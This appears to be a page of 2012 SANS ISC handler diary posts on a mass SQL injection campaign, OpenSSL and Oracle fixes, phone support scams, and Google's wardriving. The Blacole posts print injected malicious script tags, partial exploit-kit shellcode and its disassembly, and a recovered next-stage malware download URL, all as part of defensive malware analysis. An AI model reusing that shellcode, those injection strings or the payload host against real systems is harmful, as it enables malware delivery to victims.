
Sunday, May 6, 2012

Continued interest in Nikjju mass SQL injection campaign


Readers continue to write in, conveying updates from sources regarding the Nikjju mass SQL injection campaign. Like the Lilupophilupop campaign from December, ASP/ASP.net sites are targeted and scripts inserted.
Be wary of <script src=hxxp://nikjju.com/r.php></script> or <script src=hxxp://hgbyju.com/r.php></script> and the resulting fake/rogue AV campaigns they subject victims to.
Infected site count estimates vary wildly, but a quick search for the above strings will give you insight. Handler Mark H continues to track this one and indicates that the MO is similar to the Lilupophilupop campaign, but that they're trying some interesting things this round. We'll report if anything groundbreaking surfaces.
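If you want to check whether your own site content has been hit, a quick recursive search for the injected strings is a good first step. A minimal sketch from a Unix-style shell, run against a local copy of your content or a database export (the path is an example, not from the campaign reports):
$ grep -ril -e 'nikjju.com/r.php' -e 'hgbyju.com/r.php' /path/to/site-backup/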
As always, if you have logs to share, send them our way via the contact form or a comment, along with any insight you want to share with readers.

OpenSSL reissues fix for ASN1 BIO vulnerability


OpenSSL has posted an updated advisory today, indicating that the fix for CVE-2012-2110 released on 19APR2012 was not sufficient to correct the ASN1 BIO vulnerability for the OpenSSL 0.9.8 branch.
Please note that this latest issue only affects OpenSSL 0.9.8v. OpenSSL 1.0.1a and 1.0.0i already contain the patch released on the 19th, which is sufficient to correct CVE-2012-2110.
Please upgrade to 0.9.8w.
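If you are not sure which version you are running, a quick check from the command line helps (keep in mind that vendor-packaged builds often backport fixes, so the version string alone may not tell the whole story):
$ openssl version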

Blacole's obfuscated JavaScript


Looking back on how we used to analyze malicious JavaScript five years ago, it is quite amazing to see the "evolution" of code obfuscation that the bad guys went through.
Most of the current obfuscation methods make heavy use of objects and functions that are only present in the web browser or Adobe Reader. Since it is unlikely that a JavaScript analysis engine on, for example, a web proxy anti-virus solution can duplicate the entire object model of Internet Explorer, the bad guys are hoping that automated analysis will fail, and their JavaScript will make it past the virus defenses to the user's browser, where it will run just fine.
Often, this actually works. The current wave of Blackhole (Blacole) exploit kits is a good example - it took anti-virus a looong time to catch on to these infected web sites. Even today, the raw malicious JavaScript block full of exploit attempts comes back with only 14/41 on VirusTotal.
Unlike "older" obfuscation methods, the Blacole encoding is almost human readable again. But automated analysis still has a tough time with it, because the code is heavy on browser objects and function prototypes.
None of this will run in command line JavaScript interpreters like "SpiderMonkey". Analysis environments like Cuckoo and Wepawet are doing a pretty good job at this, but often also trip up.
If all else fails, manual analysis of the code, while tedious, usually leads to the desired result. A bit further down in the JavaScript block, we find a loop that replaces/transposes characters based on their ASCII code: if the ASCII code is >25 and <52, 26 gets added to it; if it is >=52 and <78, 26 gets subtracted; otherwise, the ASCII code remains unchanged. In effect, the two ranges are swapped against each other - 'A' (65) becomes chr(39), an apostrophe, and the apostrophe becomes an 'A'. This is a "poor man's Caesar Cipher", swapping out one letter against another.
Something we can readily reproduce in a couple lines of Perl :)
$ cat decode.pl
#!/usr/bin/perl -w
# Undo Blacole's "poor man's Caesar": swap the ASCII ranges 26-51 and 52-77
while (<>) {
  for ($i=0; $i<length($_); $i++) {
    $c=substr($_,$i,1);
    $o=ord($c);                   # ASCII code of the current character
    if (($o>25) && ($o<52)) {
      $k=$o+26;                   # lower range: shift up
    } elsif (($o>=52) && ($o<78)) {
      $k=$o-26;                   # upper range: shift down
    } else {
      $k=$o;                      # everything else passes through unchanged
    }
    print chr($k);
  }
}
And, lo and behold:
$ cat malscript.js | ./decode.pl

The decoding is not yet complete (there are a couple more steps in this obfuscation), but the name and location of one of the EXEs is already apparent.

Thanks to ISC reader Jan for the sample.

Blacole's shell code


Let's assume you finished the analysis of Blacole's obfuscated JavaScript (see my earlier diary today), you are still left with a block of %u-encoded shellcode, and you wonder what it does. The first step in shellcode analysis is to "clean it up": in the case at hand, we have to remove the spurious "script" tags, because they would trip us up in any of the following steps.
Once we're left with only the actual Unicode escapes (%uxxyy...), we can turn these into printable characters. Note the swapped bytes in the substitution below: each %uXXYY escape encodes a little-endian 16-bit value, so the low byte comes first in memory:
$ cat raw.js | perl -pe 's/%u(..)(..)/chr(hex($2)).chr(hex($1))/ge' > decoded.bin
$ cat decoded.bin | hexdump -C
00000000 41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 |AAAAf.äüüë.X1Éf.|
00000010 e9 57 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff |éWþ.0(@âúë.èëÿÿÿ|
00000020 ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 |­Ì].Áw.èL£h.£h$£|
00000030 58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 |X4~£^ .óN£v.+\..|
00000040 a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 |©Æ=8××.£h.ën..]Ó|
[...]
This doesn't result in anything all that useful yet. Shellcode is in assembly language, so it wouldn't be "readable" in a hex dump anyway. But since most shellcode just downloads and runs an executable .. well, the name of the EXE could have been visible. Not in this case, because the shellcode is .. encoded one more time :).
Next step: Disassemble.
The quickest way to do so from a Unix command line (that I'm aware of) is to wrap the shell code into a small C program, compile it, and then disassemble it:
$ cat decoded.bin | perl -ne 's/(.)/printf "0x%02x,",ord($1)/ge' > decoded.c
results in
0x41,0x41,0x41,0x41,0x66,0x83,0xe4,0xfc,0xfc,0xeb,0x10,0x58,0x31,0xc9 [...]
which is the correct format to embed into a small C file:
$ cat decoded.c
unsigned char shellcode[] = {
0x41,0x41,0x41,0x41,0x66,0x83,0xe4,0xfc, [...] };
int main() { }
which in turn can be compiled:
$ gcc -O0 -fno-inline decoded.c -o decoded.obj
which in turn can be disassembled:
$ objdump -M intel,i386 -D decoded.obj > decoded.asm
and we are left with a file "decoded.asm". This file will contain all the glue logic that this program needs to run on Unix .. but we're not interested in that. The only thing we're after is the disassembled contents of the array "shellcode":
0000000000600840 <shellcode>:
 600840:       41                      inc    ecx
 600841:       41                      inc    ecx
 600842:       41                      inc    ecx
 600843:       41                      inc    ecx
 600844:       66 83 e4 fc             and    sp,0xfffffffc
 600848:       fc                      cld
 600849:       eb 10                   jmp    60085b <shellcode+0x1b>
 60084b:       58                      pop    eax
 60084c:       31 c9                   xor    ecx,ecx
 60084e:       66 81 e9 57 fe          sub    cx,0xfe57
 600853:       80 30 28                xor    BYTE PTR [eax],0x28
 600856:       40                      inc    eax
 600857:       e2 fa                   loop   600853 <shellcode+0x13>
 600859:       eb 05                   jmp    600860 <shellcode+0x20>
 60085b:       e8 eb ff ff ff          call   60084b <shellcode+0xb>
 600860:       ad                      lods   eax,DWORD PTR ds:[esi]
 600861:       cc                      int3
 600862:       5d                      pop    ebp
 [...]
A-ha! Somebody is XOR-ing something here with 0x28 (the instruction at 600853). If we look at this in a bit more detail, we notice an "odd" combination of JMP and CALL.
Why would the code JMP to an address, only to CALL right back to the address behind the original JMP? Well .. the shell code has no idea where it resides in memory when it runs, and in order to XOR-decode the remainder of the shellcode, it has to determine its current address. A "CALL" is a function call, and pushes a return address onto the CPU stack. Thus, after the "call 60084b" instruction at 60085b, the stack will contain 600860 as the return address. The "pop eax" at 60084b then pops this address off the stack, which means that register EAX now points to 600860 .. and the "xor BYTE PTR [eax],0x28" / "inc eax" / "loop" sequence then cycles over the shellcode and XORs every byte with 0x28.
Let's try the same in Perl:
$ cat decoded.bin | perl -pe 's/(.)/chr(ord($1)^0x28)/ge' > de-xored.bin
$ hexdump -C de-xored.bin | tail -5
00000190 0e 89 6f 01 bd 33 ca 8a 5b 1b c6 46 79 36 1a 2f |..o.½3Ê.[.ÆFy6./|
000001a0 70 68 74 74 70 3a 2f 2f 38 35 2e 32 35 2e 31 38 |phttp://85.25.18|
000001b0 39 2e 31 37 34 2f 71 2e 70 68 70 3f 66 3d 62 61 |9.174/q.php?f=ba|
000001c0 33 33 65 26 65 3d 31 00 00 28 25 0a             |33e&e=1..(%.    |
Et voilà, we get our next stage URL.
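As a shortcut, once the XOR layer is stripped, plain-ASCII artifacts like this URL can often be pulled out directly with strings instead of eyeballing a hex dump:
$ strings de-xored.bin | grep -i http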
If you want to reproduce this analysis, you can find the original (raw.js) shellcode file on Pastebin.

Who's tracking phone calls that target your computer? Stay Tuned to the ISC


The story I am about to tell is similar to the diaries posted by Rob VandenBrink in July 2010, Mark Hofman in May of 2011 and Daniel Wesemann in March of 2012.  This past week I got a call from someone I thought was a regular old telemarketer, until they said they were from a company in Texas providing Microsoft support.  The caller had a very thick Indian accent.  I played along like a dumb user (the lady kept getting very angry with me when I asked her to repeat things and said I didn't understand :)
I got to look at my logs by running "eventvwr" from the Run prompt.  In my application logs, I found out that warning and error messages were really "viruses" and that I should not click on them, because they would multiply and destroy my motherboard.  I also got to run "inf virus" (which just opens the Windows inf folder and disregards the word "virus") and was asked if I had downloaded those files.  Of course I said no, and she told me they were viruses and all sorts of evil things that had been downloaded to my computer.  She then said that Microsoft had developed a very special piece of software that would take care of all of this for me, and that she would help me.  She asked me to type "www.logmein123.com" at the Run line.  At this point, 40 minutes in, I told her I had to go somewhere.  I asked if I could call her back, because I sure didn't want all that stuff on my computer.  She said I could, gave me the number 773-701-5437, and said her name was Peggy.  I didn't have time to finish the call, but I sure would have liked to fire up a VM and see what "special software" she had for me to install.
After the call, I started researching this type of scam and was surprised to see that it seems to date back to the 2009 time frame.  However, I could not find any statistics tracking this data; maybe I am just looking in the wrong place.  I saw guidance ranging from contacting your local law enforcement to sending an email to antiphishing.org.  I checked antiphishing.org and could not find any data on this trend, nor is there any mention of it in their report released 26 April 2012 that summarized 2H2011.  It states: "This report seeks to understand trends and their significances by quantifying the scope of the global phishing problem. Specifically, this new report examines all the phishing attacks detected in the second half of 2011 (“2H2011”, July 1, 2011 through December 31, 2011)."  This type of phishing is something APWG doesn't appear to track at this time.
I consider these calls to still be phishing attempts, because APWG defines phishing as "a criminal mechanism employing both social engineering and technical subterfuge to steal consumers’ personal identity data and financial account credentials."  The delivery vector in this case is not email but a phone call; the end result is still the same.  So, where does that leave us for tracking the trend of fake calls whose target is your computer?
At this point in time, there is no central tracking of this type of delivery vector.  However, stay tuned to the ISC.  After discussing this with some of the other handlers, the ISC is going to set up a method for reporting these attempts to us for tracking and trending this delivery method.  More will be posted in the near future as soon as the details are worked out.

UPDATE:  The page for reporting these types of calls is now available at isc.sans.edu/reportfakecall.html.  Please let us know what you think and if we have missed anything.

Workaround for Oracle TNS Listener issue released!


Just a quick update to Johannes's story on the 27th about the Oracle TNS listener vulnerability (http://isc.sans.edu/diary.html?storyid=13069)

We received two updates from our readers on this today:
Reader "anothergeek" posted a comment to Johannes's story, noting that Oracle released a workaround today (Apr 30) - find details here ==> http://www.oracle.com/technetwork/topics/security/alert-cve-2012-1675-1608180.html
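For a single-instance database, the workaround in that alert boils down to restricting which transports are allowed to register instances with the listener ("Class of Secure Transports", COST). A minimal sketch of the listener.ora change, assuming a listener named LISTENER - verify the exact parameter names and values for your version (and for RAC) against Oracle's alert and support notes before relying on this:

SECURE_REGISTER_LISTENER = (IPC)
$ lsnrctl reload

The reload (or a listener restart) is needed for the change to take effect.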

Shortly after, reader R.P. pointed us to a page that had a proof of concept (with a video, no less) ==> http://eromang.zataz.com/2012/04/30/oracle-database-tns-poison-0day-video-demonstration/


So get that maintenance window scheduled, folks!  Those patches don't do you any good in your Downloads folder!

From the perspective of someone who does audits and assessments, it's a sad thing to note that in many organizations it's tough to schedule maintenance on a large Oracle server.  So many applications get piled on these that database and operating system patches can be a real challenge to book, because an interruption in service can affect dozens or hundreds of applications.

Sadly this means that database patches are often quarterly or annual events.  Or "fairy tale events" (as in never-never).

FCC posts Enquiry Documents on Google Wardriving


Remember back in 2010, when Google was in hot water for some wardriving activities, where personal information was gathered from unencrypted wireless networks found during its Streetview activities?  Deb wrote this up here ==> https://isc.sans.edu/diary.html?storyid=8794

Well, it looks like the discussion won't die - the FCC has just posted a summary of its findings here, along with some good background and a chronology of events in their investigation ==> http://transition.fcc.gov/DA-12-592A1.pdf

You'll notice that it's heavily redacted.  A version with much less redacting can be found here ==> http://www.scribd.com/fullscreen/91652398

It makes for very interesting reading.  What stood out most for me in the paper was:
  • I thought it was sensible that the engineer didn't go write a new tool for this - they used Kismet to collect the data, then massaged Kismet's output during their later analysis. Anyone who's been in almost any SANS class would realize how wrong using the tool this way was, but at least they didn't write something from scratch.
  •  Page 2 outlines the various radio licenses held by Google.  This caught my eye mostly because I'm in the process of studying up for my own license. 
  • The suggestion and implementation for the data collection in the controversy came from an unnamed engineer ("Engineer Doe" in the paper).  I found it really interesting that the final "findings" document doesn't name actual names - I'd have thought that assigning responsibility would be one of the main purposes of this doc, but hey, what do I know?
  • Engineer Doe actually outlined in a design document how the tool would collect payloads (page 10/11), but then discounted the impact because the Streetview cars wouldn't "be in close proximity to any given user for an extended period of time".  The approval for the activity came from a manager who (as far as this doc is concerned) didn't understand the implications of collecting this info, or maybe didn't read the doc, or missed the importance of that section  - though a rather pointed question about where URL information was coming from was lifted out of one critical email.
Needless to say, violating Privacy Legislation "just a little bit" is like being a little bit pregnant - the final data included userids, passwords, health information, you name it.  As they say, "close only counts in horseshoes and hand grenades" - NOT in compliance with Privacy rules!

Long story short, this document outlines how the manager(s) of the project trusted the engineer's word on the legal implications of their activity.  I see this frequently in my "day job".  Managers often don't know when to seek a legal opinion - in a lot of cases, if it sounds technical, it must be a technical decision, right?  So they ask their technical people.  Or if they know that they need a legal opinion, they frequently don't have a budget to go down this road, and so are left on their own to take their best shot at the "do the right thing" decision.  As you can imagine, if the results of a decision like this ever come back to see the light of day, it seldom ends well.   Though in Google's case, they have a legal department on staff, and I'd imagine that one of their primary directives is to keep an eye on Privacy Legislation, Regulations and Compliance to said legislation.  Then again, you can't fault the legal team if the question never gets directed their way (back to middle management).

From a project manager's point of view, this nicely outlines how expanding the scope of a project without the approval of the project sponsor is almost always a bad idea.  In most cases I’ve seen, the implications of changing the scope are all around impacts to budget and schedule, but in this case, a good idea and a neat project (Google Streetview) ended up being associated with activity that was ultimately deemed illegal, which is a real shame.  From a project manager's perspective, exceeding the project scope is almost as bad a failure as not meeting the scope.   Exceeding the scope means that you either exceeded the budget or schedule, mis-estimated the budget or schedule, or, in this case, didn't get the legal homework done on the scope overage.

Take a minute to read the FCC doc (either version).  It's an interesting chronology of a technical project's development and execution, mixed in with company politics, legal investigation and a liberal sprinkling of "I don't recall the details of that event" type statements.  Not the stuff that blockbuster movies are made of, but interesting nonetheless !

We invite your opinions, or any corrections if I've mis-interpreted any of this - please use our COMMENT FORM.  I've hit the high points, but I'm no more a lawyer than "Engineer Doe".